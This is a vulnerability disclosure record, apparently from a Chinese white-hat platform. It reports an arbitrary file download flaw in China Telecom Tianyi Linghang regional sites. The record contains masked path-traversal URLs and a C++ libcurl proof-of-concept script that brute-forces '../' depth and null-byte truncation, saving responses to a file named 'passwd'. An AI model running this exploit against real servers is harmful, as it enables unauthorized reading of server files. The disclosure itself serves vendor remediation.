2016-01-06: 细节已通知厂商并且等待厂商处理中 2016-01-08: 厂商已经确认,细节仅向厂商公开 2016-01-18: 细节向核心白帽子及相关领域专家公开 2016-01-28: 细节向普通白帽子公开 2016-02-07: 细节向实习白帽子公开 2016-02-20: 细节向公众公开
中国电信天翼领航多个分站任意文件下载漏洞 (附C++ libcurl测试脚本)
【天翼领航主站】:**.**.**.**【以下5个省份存在通用的任意文件下载漏洞】天津:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=/../../../../download2.jsp山西:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp广西:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp河北:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp云南:http://**.**.**.**/xbnet-si/download/download2.jsp?oldfilename=download2.jsp&download_file=download2.jsp【C++ libcurl脚本测试】
【POC】
最近在学习libcurl 厂商可以使用编译下面的程序来进行修复检测,Win平台 VS2010下编译通过;Linux下请修改头文件。
#define CURL_STATICLIB //必须在包含curl.h前定义 #include<string> #include<stdio.h> #include"curl/curl.h" #include<iostream> #include<Windows.h> //以下四项是必须的 #pragma comment ( lib, "libcurl.lib" ) #pragma comment ( lib, "ws2_32.lib" ) #pragma comment ( lib, "winmm.lib" ) #pragma comment ( lib, "wldap32.lib" ) using namespace std; size_t write_callback(void *ptr, size_t size, size_t nmemb, FILE *stream) { size_t written = fwrite(ptr, size, nmemb, stream); return written; } int main() { CURL *curl; CURLcode res; FILE *fp; char s[200]; char temp[300]; scanf("%s", s); strcpy(temp, s); strcat(temp,"/download2.jsp"); printf("%s\n", temp); curl = curl_easy_init(); if(curl) { fopen_s(&fp, "passwd", "ab+"); res = curl_easy_setopt(curl, CURLOPT_URL, temp); res = curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback); res = curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);; // fp当作参数传递给write_callback函数 res = curl_easy_perform(curl); long retcode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE , &retcode); if (retcode == 200 || retcode == 304 || retcode == 204) { printf("YES\n"); } else { printf("NO\n"); } /* always cleanup */ curl_easy_cleanup(curl); fclose(fp); system("pause"); } for(int i = 1; i <= 10; i++) { strcpy(temp, s); for(int j = 1; j <= i; j++) strcat(temp, "/.."); strcat(temp,"/download2.jsp"); printf("%s\n", temp); curl = curl_easy_init(); if(curl) { fopen_s(&fp, "passwd", "ab+"); res = curl_easy_setopt(curl, CURLOPT_URL, temp); res=curl_easy_setopt(curl,CURLOPT_WRITEFUNCTION,write_callback); res = curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);; // fp当作参数传递给write_callback函数 res = curl_easy_perform(curl); long retcode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE , &retcode); if (retcode == 200 || retcode == 304 || retcode == 204) { printf("YES\n"); } else { printf("NO\n"); } /* always cleanup */ curl_easy_cleanup(curl); fclose(fp); system("pause"); } } /* 00截断 */ for(int i = 1; i <= 10; i++) { strcpy(temp, s); for(int j = 1; j <= i; j++) strcat(temp, "/.."); strcat(temp,"/download2.jsp%00"); printf("%s\n", temp); curl = curl_easy_init(); if(curl) { fopen_s(&fp, "passwd", "ab+"); res = curl_easy_setopt(curl, CURLOPT_URL, temp); res=curl_easy_setopt(curl,CURLOPT_WRITEFUNCTION,write_callback); res = curl_easy_setopt(curl, CURLOPT_WRITEDATA, fp);; // fp当作参数传递给write_callback函数 res = curl_easy_perform(curl); long retcode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE , &retcode); if (retcode == 200 || retcode == 304 || retcode == 204) { printf("YES\n"); } else { printf("NO\n"); } /* always cleanup */ curl_easy_cleanup(curl); fclose(fp); system("pause"); } } return 0; }
危害等级:高
漏洞Rank:10
确认时间:2016-01-08 17:15
CNVD确认所述情况,已经转由CNCERT向中国电信集团公司通报,由其后续协调网站管理部门处置。
暂无
